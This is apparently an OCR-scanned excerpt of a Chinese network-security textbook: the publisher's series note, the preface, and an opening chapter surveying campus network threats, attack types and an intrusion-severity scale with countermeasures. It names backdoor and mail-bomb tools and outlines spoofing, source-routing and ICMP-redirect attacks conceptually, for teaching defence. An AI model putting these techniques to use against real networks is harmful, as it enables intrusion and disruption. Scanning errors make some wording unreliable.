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INTRODUCTION 


出 版 说 明 


随 着 国家 信息 化 步伐 的 加 快 和 高 等 教育 规模 的 扩大 ,社会 对 计算 机 专业 
人 才 的 需求 不 仅 体 现在 数量 的 增加 上 ,而 且 体 现在 质量 要 求 的 提高 上 ,培养 
具有 研究 和 实践 能 力 的 高 层次 的 计算 机 专业 人 才 已 成 为 许多 重点 大 学 计算 
机 专业 教育 的 主要 目标 。 目 前 ,我 国共 有 16 个 国家 重点 学 科 .20 个 博士 点 一 
级 学 科 、28 个 博士 点 二 级 学 科 集 中 在 教育 部 部 属 重点 大 学 ,这 些 高 校 在 计算 
机 教学 和 科研 方面 具有 一 定 优势 ,并 且 大 多 以 国际 著名 大 学 计算 机 教育 为 参 
照 系 , 具 有 系统 完善 的 教学 课程 体系 、 教 学 实验 体系 、 教 学 质量 保证 体系 和 人 
才 培 养 评估 体系 等 综合 体系 ,形成 了 培养 一 流 人 才 的 教学 和 科研 环境 。 

重点 大 学 计算 机 学 科 的 教学 与 科研 氛围 是 培养 一 流 计算 机 人 才 的 基 
础 ,其 中 专业 教材 的 使 用 和 建设 则 是 这 种 氛围 的 重要 组 成 部 分 ,一 批 具 有 
学 科 方向 特色 优势 的 计算 机 专业 教材 作为 各 重点 大 学 的 重点 建设 项 目 成 
果 得 到 肯定 。 为 了 展示 和 发 扬 各 重点 大 学 在 计算 机 专业 教育 上 的 优势 , 特 
别 是 专业 教材 建设 上 的 优势 ,同时 配合 各 重点 大 学 的 计算 机 学 科 建 设 和 专 
业 课 程 教学 需要 ,在 教育 部 相关 教学 指导 委员 会 专家 的 建议 和 各 重点 大 学 
的 大 力 支持 下 ,清华 大 学 出 版 社 规划 并 出 版 本 系列 教材 。 本 系列 教材 的 建 
设 旨 在 “汇聚 学 科 精 英 、 引 领 学 科 建设 .培育 专业 英才 ”, 同 时 以 教材 示范 各 
重点 大 学 的 优秀 教学 理念 ,教学 方法 、 教 学 手段 和 教学 内 容 等 。 

本 系列 教材 在 规划 过 程 中 体现 了 如 下 一 些 基 本 组 织 原则 和 特点 。 

1. 面向 学 科 发 展 的 前 沿 , 适 应 当前 社会 对 计算 机 专业 高 级 人 才 的 培养 需 
求 。 教 材 内 容 以 基本 理论 为 基础 ,反映 基本 理论 和 原理 的 综合 应 用 ,重视 实 
践 和 应 用 环节 。 

2. 反映 教学 需要 ,促进 教学 发 展 。 教 材 要 能 适应 多 样 化 的 教学 需要 , 正 
确 把 握 教学 内 容 和 课程 体系 的 改革 方向 。 在 选择 教材 内 容 和 编写 体系 时 注 
意 体现 素质 教育 创新 能 力 与 实践 能 力 的 培养 ,为 学 生 知识 、 能 力 、 素 质 协调 
发 展 创造 条 件 。 

3. 实施 精品 战略 ,突出 重点 ,保证 质量 。 规 划 教 材 建设 的 重点 依然 是 专 
业 基 础 课 和 专业 主干 课 ; 特别 注意 选择 并 安排 了 一 部 分 原来 基础 比较 好 的 优 
秀 教材 或 讲义 修订 再 版 ,逐步 形成 精品 教材 ; 提倡 并 鼓励 编写 体现 重点 大 学 
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计算 机 专业 教学 内 容 和 课程 体系 改革 成 果 的 教材 。 

4. 主张 一 纲 多 本 ,合理 配套 。 专 业 基 础 课 和 专业 主干 课 教材 要 配套 ,同一 门 课程 可 以 有 
多 本 具有 不 同 内 容 特 点 的 教材 。 处 理 好 教材 统一 性 与 多 样 化 的 关系 ; 基本 教材 与 辅助 教材 
以 及 教学 参考 书 的 关系 ; 文字 教材 与 软件 教材 的 关系 ,实现 教材 系列 资源 配套 。 

5 依靠 专家 ,择优 落实 。 在 制订 教材 规划 时 要 依靠 各 课程 专家 在 调查 研究 本 课程 教材 
建设 现状 的 基础 上 提出 规划 选 题 。 在 落实 主编 人 选 时 ,要 引入 竞争 机 制 ,通过 申报 、 评 审 确 
定 主编 。 书 稿 完成 后 要 认真 实行 审 稿 程序 ,确保 出 书 质量 。 
繁荣 教材 出 版 事业 ,提高 教材 质量 的 关键 是 教师 。 建 立 一 支 高 水 平 的 以 老 带 新 的 教材 
编写 队伍 才能 保证 教材 的 编写 质量 ,希望 有 志 于 教材 建设 的 教师 能 够 加 入 到 我 们 的 编写 队 
伍 中 来 。 


教材 编 委 会 


FOREWORD 


前 言 


随 着 计算 机 的 迅速 发 展 , 各 大 院 校 都 开设 了 计算 机 专业 ,报考 计算 机 专 
业 的 学 生 也 越 来 越 多 。 但 是 , 当 学 生 们 离开 学 校 ,面临 就 业 和 工作 的 时 候 ,就 
会 发 现 他 们 在 校 学 习 的 一 些 专业 知识 有 可 能 已 经 过 时 了 ,而且 离 实际 的 工作 
需要 存在 不 小 的 差距 。 

造成 这 种 局 面 的 原因 有 两 个 方面 ,一 方面 ,有 些 学 校 的 计算 机 教材 更 新 
速度 比较 缓慢 ,课堂 讲授 的 还 是 BASIC 语言 .C 语言 等 基础 课程 ,而 新 技术 的 课 
程 几乎 没有 ,陈旧 的 知识 自然 引 不 起 学 生 学 习 的 兴趣 。 另 一 方面 ,学 生 受 到 
社会 上 浮躁 、 急 功 近 利 等 风气 的 影响 ,对 基础 知识 的 学 习 兴 趣 不 大 ,总 想 接触 
实际 有 用 的 东西 。 

编写 这 本 教材 的 目的 就 是 向 学 习 计 算 机 专业 的 学 生 介 绍 当 前 比较 热门 
的 网 络 安全 技术 ,同时 通过 图 例 和 动手 实验 ,提高 计算 机 专业 学 生 的 动手 实 
践 能 力 。 

网 络 技术 的 飞速 发 展 使 得 新 的 网 络 技术 和 标准 不 断 问世 。 本 书 并 没有 
长 篇 累 自 地 讲解 基本 原理 ,而 是 总 结 性 地 介绍 了 相关 的 理论 知识 ,并 把 容易 
混淆 的 知识 进行 了 比较 。 

本 书 在 保证 内 容 丰富 的 前 提 下 ,注重 理论 与 实际 的 结合 ,每 章 都 有 课 后 
习题 帮助 读者 复习 和 巩固 所 学 的 内 容 , 并 启发 读者 思考 。 

本 书 有 配套 的 实验 教材 (网 络 与 信息 安全 基础 实验 教程 ), 除 第 1 章 “ 网 
络 安 全 概述 ”外 ,其 他 各 章 都 设计 了 对 应 的 实验 ,以 便于 学 生 在 学 完 基础 理论 
后 ,通过 动手 实验 来 加 深 对 知识 的 理解 。 

本 书 的 编写 得 到 了 北京 亿 中 邮 信 息 技术 有 限 公 司 白 班 ,高 过 工 程 师 的 大 
力 支持 。 华 为 30M 技 术 有 限 公司 的 季 勇 军 . 陈 旭 工 程 师 对 本 书 的 初稿 提出 了 
很 多 宝贵 意见 。 北 京 联 信永 益 科 技 有 限 公司 的 沈 虹 工程 师 和 深信 服 电子 科 
技 有 限 公司 华北 区 的 官 俊 东 工程 师 也 为 本 书 提供 了 很 多 有 价值 的 建议 。 另 
外 ,解放 军 信 息 工 程 大 学 的 王 颖 硕士 也 参加 了 本 书 的 部 分 编写 工作 。 对 此 笔 
者 表示 诚挚 的 谢意 。 

2006 年 ,本 书 已 入 选 “ 十 一 五 ”国家 级 规划 教材 。 在 此 笔者 要 感谢 北京 大 
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学 信息 科学 与 技术 学 院 的 领导 和 清华 大 学 出 版 社 在 规划 、 编 写 和 出 版 中 的 大 力 支持 和 帮助 。 
由 于 时 间 仓 促 ,加 上 编者 水 平 有 限 , 书 中 难免 还 存在 一 些 缺 点 甚至 错误 ,恳请 广大 读者 
和 专家 批评 指正 。 读 者 在 本 书 及 课件 等 相关 资源 的 使 用 中 遇 到 任何 问题 或 有 何 建议 ,请 发 
邮件 至 : fuhy@tup.tsinghua.edu.mn。 欢 迎 读者 与 我 们 进行 交流 ,帮助 我 们 提高 编写 质量 。 
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2008 年 2 月 
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网 络 安全 概述 第 1 章 


随 着 计算 机 网 络 的 发 展 , 网 络 安全 技术 得 到 了 前 所 未 有 的 重视 。 本 章 的 
讲解 将 对 本 书后 面 章节 的 学 习 起 到 提纲 寿 领 的 作用 。 

本 章 要 点 如 下 : 

。 校园 网 的 安全 现状 ; 

。 针对 校园 网 的 攻击 与 防护 ; 

。 校园 网 的 安全 管理 。 


1.1 为 什么 要 重视 网 络 安全 


111 网 络 安全 的 现状 


随 着 我 国教 育 信息 化 的 飞速 发 展 , 城 域 网 和 校园 网 络 的 建设 与 应 用 得 到 
了 广泛 的 普及 。 然 而 ,网 络 的 信息 安全 问题 却 不 容 乐 观 。 校 园 网 络 安全 问题 
已 经 成 为 教育 主管 部 门 和 各 地 学 校 管理 者 关心 和 研究 的 重要 课题 。 


1. 安全 事件 的 发 生 仍 然 呈 上 升 趋势 


据 相关 评测 部 门 统计 ,2006 年 上 半年 ,病毒 和 犯罪 性 安全 攻击 增长 了 
70% ,教育 行业 虽然 不 具有 较 高 的 商业 价值 ,也 不 是 网 络 攻击 的 主要 目标 ,但 
是 普通 用 户 安全 防护 意识 的 不 足 、 用 户 数量 的 增多 也 导致 了 校园 网 内 信息 安 
全 事件 的 频繁 发 生 。 

2006 年 上 半年 ,各 种 间谍 软件 成 为 互联 网 安全 的 最 大 威胁 ,它们 通常 在 
用 户 不 知情 的 情况 下 ,把 截获 的 用 户 信 息 发 送 给 "信息 收集 者 ,如 盗 取 用 户 
网 络 游戏 的 账号 ,并 变卖 玩家 的 装备 ,这些 都 严重 损害 了 用 户 的 利益 。 

教育 网 和 各 地 中 小 型 校园 网 虽然 没有 遭受 类 似 2004 年 “震荡 波 " 等 恶性 
病毒 的 大 面积 侵害 ,但 蠕虫 病毒 间谍 软件 、 网 络 钓鱼 等 各 种 恶意 代码 充斥 在 
校园 网 络 中 ,严重 影响 了 校园 网 的 正常 运行 。 

另外 ,我 国 高 校 的 校园 网 中 一 直 存 在 着 管理 不 严 的 问题 。 从 2005 年 的 
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“MSN 性 感 鸡 ” 到 利用 QQ 传播 的 “ 书 虫 ".QQRRober、QQTran, 以 及 可 以 通过 多 种 IM 平 
台 进 行 传播 的 QQTing 等 ,它们 都 在 校园 网 中 得 到 了 广泛 的 传播 。 


2. 安全 标准 引用 不 及 时 


根据 BSI(British Standards Institution ,英国 标准 协会 ) 的 统计 ,我 国 通 过 国际 安全 认证 
的 企业 和 政府 信息 化 职能 部 门 相 对 较 少 ,而 引入 某 个 管理 标准 进行 管理 的 校园 网 就 更 少 了 。 
目前 校园 网 的 网 络 结构 没有 统一 的 样式 ,安全 产品 和 邮件 服务 器 也 使 用 了 不 同 厂 商 的 产品 ， 
从 而 造成 网 络 的 维护 和 技术 支持 也 是 良 劳 不 齐 。 


1.12 加 强 青少年 的 网 络 安全 意识 


有 些 青 少年 为 了 满足 自己 的 好 奇 心 , 利 用 从 网 络 上 学 来 的 简单 人 侵 手段 ,非法 获取 别人 
的 信息 ,恶意 修改 别人 的 网 站 ,这 些 都 触犯 了 我 国 的 法 律 。 

因此 ,应 加 强 计算 机 安全 教育 ,包括 提高 各 级 网 络 管理 人 员 对 网 络 重要 性 的 认识 和 安全 
措施 的 掌握 水 平 , 向 社会 宣传 计算 机 网 络 人 侵 的 危害 性 ,尤其 要 加 强 拥有 Internet 访问 能 力 
的 青少年 的 网 络 安全 法 律 观念 。 

具体 措施 可 以 包括 : 以 公益 广告 的 形式 向 社会 宣传 计算 机 网 络 安全 的 重要 性 和 法 律 含 
义 ,在 校园 网 的 主页 上 以 醒目 的 方式 告 诚 有 和 人 侵 倾向 的 网 络 用 户 ; 校园 网 在 注册 用 户 的 时 
候 , 要 求 使 用 实名 制 ,网络 管理 员 在 发 现 有 不 明 身 份 的 用 户 时 ,应 立即 确定 其 身份 ,并 对 其 发 
出 警告 ,提前 制止 可 能 的 网 络 犯罪 ; 校园 网 应 该 有 专门 的 网 络 安全 管理 人 员 对 网 络 进行 时 
段 监控 ,并 定期 进行 安全 检查 ,同时 还 应 在 网 络 中 配置 相关 的 安全 检测 工具 。 

切实 地 加 强 网 络 的 安全 配置 和 管理 ,做 到 防 患 于 未 然 ,可 以 有 效 地 降低 计算 机 网 络 受 到 
攻击 的 频率 ,减少 因 受到 攻击 而 产生 的 损失 ,增强 校园 网 络 的 安全 性 。 


1.2 什么 是 攻击 


攻击 的 定义 是 : 仅仅 发 生 在 入 侵 行为 完全 完成 , 且 入 侵 者 已 进入 目标 网 络 内 的 行为 称 
为 攻击 。 但 更 为 积极 的 观点 是 : 所 有 可 能 使 一 个 网 络 受 到 破坏 的 行为 都 称 为 攻击 。 即 从 一 
个 人 侵 者 开始 在 目标 机 上 工作 的 那个 时 刻 起 ,攻击 就 开始 了 。 

通常 在 正式 攻击 之 前 ,攻击 者 先进 行 试探 性 攻击 ,目标 是 获取 系统 有 用 的 信息 ,此 时 包 
括 Ping 扫描 、 端 口 扫描 、 账 户 扫 描 、DNS 转换 以 及 恶性 的 IP Sniffer( 通 过 技术 手段 非法 获取 
IP 包 ,以 获得 系统 的 重要 信息 ) ,特洛伊 木马 Trojan) 程序 等 。 


12.1 收集 信息 的 主要 方式 


经 常 使 用 的 信息 收集 软件 包括 : NSS、Strobe、 Netscan、SATAN (Security Administrator's 
Tool for Auditing Network) Jakal 和 FTPScan 等 以 及 各 种 Sniffer 软件 。 从 广义 上 讲 , 特 
洛 伊 木 马 程 序 也 是 收集 信息 攻击 的 重要 手段 。 收 集 信息 攻击 有 时 是 其 他 攻击 手段 的 前 奏 。 
对 于 简单 的 端口 扫描 ,敏锐 的 网 络 安 全 管理 员 往往 可 以 从 异常 的 日 志 记 录 中 发 现 攻 击 者 的 
企图 。 但 是 对 于 隐秘 的 Sniffer 软件 和 特洛伊 木马 程序 来 说 ,检测 它们 的 存在 就 是 一 件 高 级 
和 困难 的 任务 。 
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1. Sniffer 


Sniffer 本 来 是 用 来 诊断 网 络 连 接 情况 的 ,是 带 有 很 强 Debug 功能 的 常用 网 络 分 析 器 ， 
所 以 黑客 利用 它 来 截获 用 户口 令 等 敏感 信息 ,甚至 还 可 以 用 它 来 攻击 相 邻 的 网 络 。 

检测 Sniffer 的 存在 是 个 非常 困难 的 任务 ,因为 Sniffer 本 身 只 是 被 动 地 接收 数据 ,而 不 
发 送 任何 数据 包 。 

一 般 来 讲 , 真 正 需要 保密 的 只 是 一 些 关键 数据 ,如 用 户 名 和 口令 等 。 所 以 可 以 使 用 IP 
包 级 的 加 密 技术 ,这 样 即 使 Sniffer 得 到 数据 包 , 也 很 难得 到 真正 的 数据 信息 。 这 样 的 工具 
包括 SSH(Secure Shell) 以 及 F-SSH ,尤其 是 F-SSH 针对 一 般 利 用 TCP/IP 进行 通信 的 公 
共 传 输 提 供 了 非常 强大 的 、 多 级 别 的 加 密 算法 。 另 外 采用 网 络 分 段 技术 ,减少 信任 关系 等 手 
段 可 以 将 Sniffer 的 危害 控制 在 较 小 范围 以 内 。 


2. 特洛伊 木马 


RFC1244 中 给 出 了 特洛伊 木马 程序 的 经 典 定义 :“ 它 提供 了 一 些 有 用 的 或 仅仅 是 有 意 
思 的 功能 。 但 是 特洛伊 木马 程序 通常 会 做 一 些 用 户 不 希望 发 生 的 事 , 诸 如 在 用 户 不 了 解 的 
情况 下 复制 文件 或 窃取 用 户 的 密码 、 直 接 将 重要 资料 转送 出 去 和 破坏 系统 等 行为 。” 

很 多 情况 下 ,特洛伊 木马 是 在 二 进 制 代码 中 被 发 现 的 ,它们 大 多 数 无 法 直接 阅读 ,并 且 
可 以 应 用 在 很 多 系统 平台 上 , 它 的 传播 方式 和 病毒 非常 相似 。 从 Internet 上 下 载 的 软件 ,万 
其 是 免费 软件 和 共享 软件 ,从 匿名 服务 器 或 者 USERNET 新 闻 组 中 获得 的 程序 等 都 有 可 能 
拥 绑 了 特洛伊 木马 程序 。 所 以 经 常 上 网 的 用 户 自 觉 做 到 不 轻易 安装 或 使 用 来 路 不 明 的 软件 
是 十 分 必要 的 。 

检测 一 个 特洛伊 木马 程序 ,需要 深入 了 解 有 关 操 作 系统 的 知识 。 用 户 可 以 通过 检查 文 
件 的 更 改 时 间 ,文件 长 度 、 校 验 和 等 来 判断 文件 是 否 进行 过 非 预期 的 操作 。 另 外 ,文件 加 密 
也 是 有 效 地 检查 特洛伊 木马 程序 的 方法 。 


122 攻击 的 主要 手段 
1. 口令 入 侵 


口令 入 侵 包 括 两 个 层次 的 行为 : 一 种 是 破解 使 用 加 密 口令 的 用 户 文件 ,对 于 这 种 破解 ， 
攻击 者 可 以 很 轻松 地 完成 任务 ,因为 目标 文件 通常 已 经 下 载 到 攻击 者 本 地 的 计算 机 上 ,受害 
者 对 此 已 经 无 能 为 力 ; 另 一 种 是 破解 目标 计算 机 的 系统 口令 ,对 于 这 种 破解 ,攻击 者 通常 会 
小 心 处 理 ,以免 触 动 目标 计算 机 的 报警 系统 ,因为 通常 情况 下 ,在 系统 账号 登录 失败 达到 一 
定 次 数 后 ,计算 机 通常 会 自动 锁 死 ,并 触发 一 定 的 日 志 记录 功能 或 进行 报警 (包括 向 系统 管 
理 员 发 送 邮件 进行 通知 ) 。 

2. 后 门 软件 攻击 


后 门 软件 攻击 是 互联 网 上 用 得 比较 多 的 一 种 攻击 手法 。BackOrifice2000、 冰 河 等 都 是 
比较 著名 的 后 门 软件 ,它们 可 以 非法 地 取得 用 户 计算 机 的 超级 管理 员 权限 ,并 完全 控制 用 户 
的 计算 机 。 这 些 后 门 软件 一 般 分 为 服务 器 端 和 用 户 端 两 部 分 ,黑客 进行 攻击 时 ,会 使 用 用 户 
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端 程序 登录 到 已 安装 好 服务 器 端 程序 的 计算 机 ,这 些 服务 器 端 程序 都 比较 小 ,一 般 会 被 捆绑 
在 某 些 软件 上 。 而 且 大 部 分 后 门 软件 的 重生 能 力 比 较 强 ,给 用 户 的 清除 工作 造成 一 定 的 
困难 。 

目前 最 流行 的 是 反弹 端口 的 后 门 程序 ,这 类 后 门 程序 不 再 区 分 客户 端 和 服务 器 端 软件 ， 
只 需要 安装 在 目标 计算 机 上 ,使 用 的 端口 也 是 随机 的 ,这 样 对 利用 端口 进行 查 毒 的 软件 来 说 
是 个 很 大 的 威胁 。 


3. 监听 法 
这 一 部 分 介绍 的 内 容 请 参阅 1. 2. 1 节 的 Sniffer 部 分 。 
4. E-mail 技术 


电子 邮件 (E-maiD) 是 互联 网 上 运用 得 十 分 广泛 的 一 种 通信 和 方式。 黑客 可 以 使 用 一 些 邮 
件 炸 弹 软件 或 CGI 程序 向 目的 邮箱 发 送 大 量 内 容重 复 、 无 用 的 垃圾 邮件 ,使 目的 邮箱 容量 
被 占 满 ,从 而 达到 让 其 无 法 使 用 的 目的 。 当 垃圾 邮件 的 发 送 流量 特别 大 时 ,还 有 可 能 造成 邮 
件 系 统 对 于 正常 的 工作 反应 缓慢 ,甚至 瘫痪 的 情况 出 现 ,这 一 点 和 后 面 要 讲 到 的 拒绝 服务 攻 
击 (DDoS) 比 较 相 似 。 

E-mail 炸弹 是 一 种 简单 有 效 的 侵扰 工具 。 它 反复 发 送 给 目标 接收 者 相同 的 信息 ,用 这 
些 垃圾 信息 填 满 用 户 的 邮箱 空间 。 例 如 bomb02. zip(Mail Bomber) 软 件 ( 运 行 在 Windows 
平台 ) 和 EmailBomb 软件 (运行 在 UNIX 平台 ) 的 使 用 都 非常 简单 。 

对 于 遭受 此 类 攻击 的 邮箱 ,可 以 使 用 一 些 垃 圾 邮件 清除 软件 来 解决 ,其 中 常见 的 有 
Spam Eater、Spamkiller 等 。Outlook 等 软件 也 提供 过 滤 功 能 ,发 现 此 类 攻击 后 ,将 源 目标 地 
址 放 入 拒绝 接收 列表 中 即 可 。 

邮件 列表 连接 产生 的 效果 同 邮件 炸弹 基本 相同 。 它 将 目标 地 址 同时 注册 到 几 十 个 ( 甚 
至 成 百 上 千 ) 个 邮件 列表 中 ,由 于 一 般 每 个 邮件 列表 每 天 会 产生 许多 邮件 ,攻击 效果 也 很 
明显 。 

许多 程序 能 够 同时 完成 这 两 种 攻击 ,包括 Upyours(Windows),KaBoom(Windows)， 
Avalanche ( Windows ), Unabomber ( Windows), eXtremeMail ( Windows ), Homicide 
(Windows) ,Bombtrack(Macintosh) ,FlameThrower( Macintosh) 等 。 

攻击 者 可 以 通过 建立 邮件 列表 数据 库 , 也 可 以 通过 手工 方式 完成 攻击 。 


5. 电子 欺骗 (spoofing attack) 


电子 欺骗 包括 针对 HTTP、FTP、DNS 等 协议 的 攻击 ,这 种 攻击 可 以 窃取 普通 用 户 甚至 
超级 用 户 的 权限 ,任意 修改 信息 内 容 , 造 成 巨大 危害 。 另 一 种 攻击 是 IP 欺骗 , 即 攻击 者 伪造 
他 人 的 IP 地 址 。 本 质 上 就 是 让 一 台 计 算 机 来 扮演 另 一 台 计 算 机 ,借以 达到 蒙混 过 关 的 
目的 。 

几乎 所 有 的 电子 欺骗 都 倚赖 于 目标 网 络 的 信任 关系 (计算 机 之 间 的 互相 信任 )。 和 人 侵 者 
可 以 使 用 扫描 程序 来 判断 远程 计算 机 之 间 的 信任 关系 。 这 种 技术 欺骗 成 功 的 案例 较 少 ,要 
求人 侵 者 具备 特殊 的 工具 和 技术 (并 且 对 非 UNIX 系统 不 起 作用 ) 。 
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6. 拒绝 服务 (Denial of Service,DoS) 


从 网 络 攻击 的 各 种 方法 和 所 产生 的 破坏 情况 来 看 ,DoS 算是 一 种 很 简单 但 又 很 有 效 的 
进攻 方式 。 它 的 目的 就 是 拒绝 用 户 的 服务 访问 ,破坏 组 织 的 正常 运行 ,最 终 它 会 使 用 户 的 
Internet 连接 和 网 络 系统 部 分 或 全 部 失效 。Dos 的 攻击 方式 有 很 多 种 ,最 基本 的 DoS 攻击 
就 是 利用 合理 的 服务 请 求 来 占用 过 多 的 服务 资源 ,从 而 使 合法 用 户 无 法 得 到 服务 。 


123 入 侵 的 常用 策略 
1. 利用 系统 文件 攻击 


这 里 以 攻击 UNIX 系统 为 例 , 黑 客 可 以 通过 Telnet 指令 操作 得 知 Sendmail 的 版 本 号 ， 
从 而 结合 已 公布 的 资料 了 解 到 操作 系统 中 会 有 哪些 安全 漏洞 。 禁 止 对 可 执行 文件 的 访问 虽 
不 能 防止 黑客 对 它们 的 攻击 ,但 至 少 可 以 使 这 种 攻击 变 得 更 困难 。 


2. 伪造 信息 攻击 


黑客 可 以 通过 发 送 伪造 的 路 由 信息 ,构造 系统 源 主 机 和 目标 主机 的 虚假 路 径 ,从 而 使 流 
向 目标 主机 的 数据 包 均 经 过 攻击 者 的 系统 主机 。 这 样 攻击 者 就 有 可 能 获得 用 户 密码 等 敏感 
信息 。 


3. 利用 协议 弱点 攻击 


IP 地 址 的 源 路 径 选 项 允许 IP 数据 包 选 择 一 条 捷径 通 往 系统 目的 主机 的 路 径 。 假 设 攻 
击 者 试图 连接 到 防火 墙 后 面 的 主机 A 上 ,攻击 者 只 需要 在 送出 的 请 求 报 文中 设置 IP 源 路 
径 选 项 ,使 报 文 有 一 个 目的 地 址 指向 防火 墙 ,而 最 终 地址 是 主机 A。 当 报 文 到 达 防 火 墙 时 被 
允许 通过 ,因为 它 指向 防火 墙 而 不 是 主机 A。 防 火 墙 的 IP 层 处 理 该 报 文 的 源 路 径 被 改变 ， 
并 被 发 送 到 内 部 网 上 , 报 文 就 这 样 到 达 了 主机 A。 


4. 网 络 钓鱼 


在 被 攻击 主机 上 启动 一 个 可 执行 程序 或 打开 一 个 链接 ,该 程序 或 链接 显示 一 个 伪造 的 
登录 界面 。 当 用 户 在 这 个 伪装 的 界面 上 输入 登录 信息 (用 户 名 、 密 码 等 ) 后 ,该 程序 将 用 户 输 
入 的 信息 传送 到 攻击 者 主机 ,然后 关闭 界面 给 出 提示 信息 说 “系统 故障 ”, 要 求 用 户 重新 登录 
或 跳 转 到 一 个 真实 的 界面 上 。 此 后 才 会 出 现 真 正 的 登录 界面 。 


5. 利用 系统 管理 员 失误 的 攻击 


网 络 安全 的 重要 因素 之 一 就 是 人 。 网 络 安全 中 常 说 的 一 句 话 就 是 :“ 堡 垒 最 容易 从 内 
部 攻破 ”。 人 为 的 失误 包括 WWW 服务 器 系统 的 配置 差错 ,普通 用 户 使 用 权限 扩大 等 。 这 
样 就 给 黑客 造成 了 可 乘 之 机 。 黑 客 常 利 用 系统 管理 员 的 失误 收集 用 于 攻击 的 信息 。 


6. 利用 ICMP 报 文 攻击 
黑客 利用 ICMP 报 文 的 重 定向 消息 可 以 改变 路 由 列表 ,路 由 器 可 以 根据 这 些 消 息 建议 
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主机 走 另 一 条 更 好 的 路 径 。 攻 击 者 可 以 有 效 地 利用 重 定向 消息 把 连接 转向 一 个 不 可 靠 的 主 
机 或 路 径 ,或 造成 所 有 报 文 通过 一 个 不 可 靠 主 机 进行 转发 。 


7. 利用 源 路 径 选 项 弱点 攻击 


一 个 外 部 攻击 者 可 以 传送 一 个 具有 内 部 主机 地 址 的 源 路 径 报 文 。 服 务 器 会 相信 这 个 报 
文 并 向 攻击 者 发 送 回 应 报 文 。 


8.“ 跳 跃 式 ? 攻 击 


现在 许多 网 点 使 用 UNIX 操作 系统 。 黑 客 们 会 设法 先 登录 到 一 台 UNIX 的 主机 上 , 通 
过 该 操作 系统 的 漏洞 来 取得 系统 特权 ,然后 再 以 此 为 据点 访问 其 余 主 机 ,被 称 为 “跳跃 ” 
(Island-Hopping)。 黑 客 们 在 到 达 目 的 主机 之 前 往往 会 这 样 跳 几 次 。 这 样 被 攻击 网 络 即使 
发 现 了 黑客 是 从 何 处 向 自己 发 起 了 攻击 ,管理 人 员 也 很 难 顺 茧 摸 瓜 找到 攻击 者 ,而 且 黑 客 在 
取得 某 台 主机 的 系统 特权 后 ,可 以 在 退出 时 删 掉 系 统 日 志 , 清 除 痕迹 。 攻 击 者 只 要 能 够 登录 
到 UNIX 系统 上 ,就 能 相对 容易 地 成 为 超级 用 户 ,这 使 得 它 同时 成 为 黑客 和 安全 专家 们 的 
关注 点 。 


124 攻击 对 象 排名 


下 面 是 网 络 中 公布 的 容易 成 为 攻击 对 象 的 排名 ,可 见 网 络 攻击 绝 大 部 分 都 是 针对 弱 口 
令 ,安全 策略 设置 不 当 、 开 启 不 必要 的 服务 等 设置 不 当 的 服务 器 进行 攻击 的 ,归根 到 底 是 人 
的 因素 导致 了 网 络 安全 事故 的 发 生 。 

。 主机 运行 没有 必要 的 服务 。 

。 未 打 补 丁 的 .过 时 的 应 用 软件 和 硬件 固件 。 

。 在 服务 中 信息 泄露 (如 Gopher,Finger、Telnet、.SNMP、SMTP、Netstat 等 ) 。 

。 盗用 信任 关系 (如 Rsh、Rlogin、Rexec)。 

。 配置 不 当 的 防火 墙 或 路 由 器 ACL(Access Control List ,访问 控制 列表 ) 。 

。 弱 口 令 。 

。 配置 不 当 的 网 络 服务 器 。 
不 合理 的 输入 文件 系统 。 
。 配置 不 当 或 未 打 补 丁 的 Windows NT 系统 。 
无 担保 的 过 程 存 取 点 ,如 远程 存 取 服务 器 ,modem 池 等 。 


1.3 人 侵 层 次 分 析 


与 攻击 对 象 排名 不 同 的 是 ,入 侵 层次 的 划分 主要 是 从 引发 的 危险 程度 来 进行 分 析 的 。 
下 面 就 人 侵 层次 的 划分 和 相应 的 对 策 进行 讨论 。 使 用 敏感 层 的 概念 来 划分 标志 攻击 技术 如 
下 所 示 。 

。 第 一 层 : 邮件 炸弹 攻击 (E-mail Bomb) 。 

。 第 二 层 : 简单 服务 拒绝 攻击 。 

。 第 三 层 : 本 地 用 户 获得 了 非 授权 读 访问 。 


. 
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。 第 四 层 : 本 地 用 户 获 得 非 授权 的 文件 写 权限 。 

”第 五 层 : 远程 用 户 获 得 非 授权 的 账号 。 

。 第 六 层 : 远程 用 户 获 得 了 特权 文件 的 读 权限 。 

。 第 七 层 : 远程 用 户 获 得 了 特权 文件 的 写 权限 。 

。 第 八 层 : 远程 用 户 拥 有 了 根 (root) 权 限 。 

以 上 层次 划分 在 所 有 的 网 络 中 几乎 都 一 样 ,基本 上 可 以 作为 网 络 安全 工作 的 考核 指 
标 。 其 中 “本 地 用 户 ”(local user) 是 一 种 相对 概念 。 它 是 指 能 自由 登录 到 网 络 上 的 任何 一 
台 主 机 上 ,并且 在 网 络 上 的 某 台 主机 上 拥有 一 个 账户 ,在 硬盘 上 拥有 一 个 目录 的 任何 一 
不 用 户 。 

应 根据 遭受 攻击 的 不 同 层次 ,采取 不 同 的 对 策 。 

第 一 层 和 第 二 层 的 攻击 包括 服务 拒绝 攻击 和 邮件 炸弹 攻击 。 邮 件 炸弹 攻击 还 包括 登记 
列表 攻击 。 对 付 此 类 攻击 的 最 好 的 方法 是 对 源 地 址 进行 分 析 , 把 攻击 者 使 用 的 主机 (网 络 ) 
信息 加 入 访问 控制 列表 中 。 除 了 使 攻击 者 网 络 中 所 有 的 主机 都 不 能 对 目标 网 络 进行 访问 
外 ,没有 其 他 有 效 的 方法 可 以 防止 这 种 攻击 的 出 现 。 

此 类 型 的 攻击 ,破坏 性 不 大 ,但 是 发 生 的 频率 却 可 能 很 高 ,因为 人 侵 者 仅 需 具备 有 限 的 
经 验 和 专业 知识 就 能 进行 此 类 型 的 攻击 。 

第 三 层 至 第 五 层 的 攻击 包括 本 地 用 户 获得 非 授 权 读 访问 .本 地 用 户 获 得 非 授 权 的 文件 
写 权 限 和 远程 用 户 获得 非 授权 的 账户 的 攻击 。 

处 于 第 三 层 至 第 五 层 的 攻击 的 严重 程度 取决 于 对 那些 文件 的 读 或 写 权 限 的 非法 获得 。 
导致 攻击 的 原因 有 可 能 是 部 分 配置 错误 或 者 是 在 软件 内 固有 的 漏洞 。 对 于 前 者 ,管理 员 应 
该 注意 经 常 使 用 安全 工具 查找 一 般 的 配置 错误 。 后 者 的 解决 需要 安全 管理 员 花 费 大 量 的 时 
间 去 跟踪 了 解 最 新 的 软件 安全 漏洞 报告 ,下 载 补丁 或 联系 供 货 商 。 管 理 员 发 现 发 起 攻击 的 
用 户 后 ,应 该 立即 停止 其 访问 权限 ,冻结 其 账户 。 

